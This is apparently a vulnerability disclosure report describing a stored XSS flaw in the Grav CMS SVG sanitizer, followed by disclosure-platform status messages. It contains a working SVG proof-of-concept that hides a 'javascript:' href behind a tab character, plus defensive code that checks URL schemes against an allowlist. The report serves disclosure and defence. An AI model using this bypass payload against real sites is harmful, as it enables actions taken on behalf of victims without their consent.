Cross-site Scripting (XSS) - Stored in getgrav/grav
Valid
Reported on Mar 1st 2022
Description
The SVG sanitizer could be bypassed via the following SVG file, which leads to stored XSS.
Proof of Concept
<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
<a href="javascript	:alert(document.domain)">
<circle cx="0" cy="0" r="300"/>
</a>
</svg>
Upload the above SVG file in your profile, view it, and click anywhere on the page; the XSS will then be triggered.
Impact
This vulnerability allows an attacker to perform arbitrary actions on behalf of victims on the client side.
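The href in the proof of concept has a tab between `javascript` and the colon, and the WHATWG URL parser that browsers use removes tabs and newlines before it reads the scheme, so a filter that matches the literal string `javascript:` does not see it. The following is an added example, not Grav's sanitizer code and not part of the original report: it contrasts such a string match with an allowlist applied to the scheme the URL parser actually resolves. The function names, the placeholder base URL and the sample values are assumptions constructed for illustration, and the values are assumed to be attribute values already decoded by an XML parser.

```javascript
// Added example, not Grav's code. All names here are hypothetical.

// Constructed samples: href values as an XML parser would return them.
// The first is the href from the proof of concept, tab included.
const SAMPLE_HREFS = [
  "javascript\t:alert(document.domain)",
  "javascript:alert(document.domain)",
  "https://example.org/logo",
  "#layer1",
  "images/icon.svg",
];

// Blocklist check on the raw string. The tab splits the literal
// "javascript:", so the PoC value is reported as safe.
function naiveIsSafe(href) {
  return !href.trim().toLowerCase().startsWith("javascript:");
}

const ALLOWED_PROTOCOLS = new Set(["http:", "https:", "mailto:"]);
// Placeholder base so relative references and fragments resolve.
const BASE = "https://sanitizer.invalid/";

// Resolve the value with the WHATWG URL parser (global URL in Node and
// browsers), which drops tabs and newlines before reading the scheme,
// then allowlist the protocol it reports.
function isSafeHref(href) {
  let url;
  try {
    url = new URL(href, BASE);
  } catch {
    return false; // unparseable value: reject instead of guessing
  }
  return ALLOWED_PROTOCOLS.has(url.protocol);
}

// Compare both checks for every sample value.
function audit(hrefs) {
  return hrefs.map((href) => ({
    href: JSON.stringify(href), // makes the tab visible as \t
    naive: naiveIsSafe(href),
    strict: isSafeHref(href),
  }));
}

for (const row of audit(SAMPLE_HREFS)) {
  console.log(`${row.href}  naive=${row.naive}  strict=${row.strict}`);
}
```

An attribute that fails `isSafeHref` should be removed from the SVG before it is stored, not rewritten.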
We are processing your report and will contact the getgrav/grav team within 24 hours.
a year ago
We have contacted a member of the getgrav/grav team and are waiting to hear back.
a year ago
We have sent a follow up to the getgrav/grav team. We will try again in 7 days.
a year ago
We have sent a second follow up to the getgrav/grav team. We will try again in 10 days.
a year ago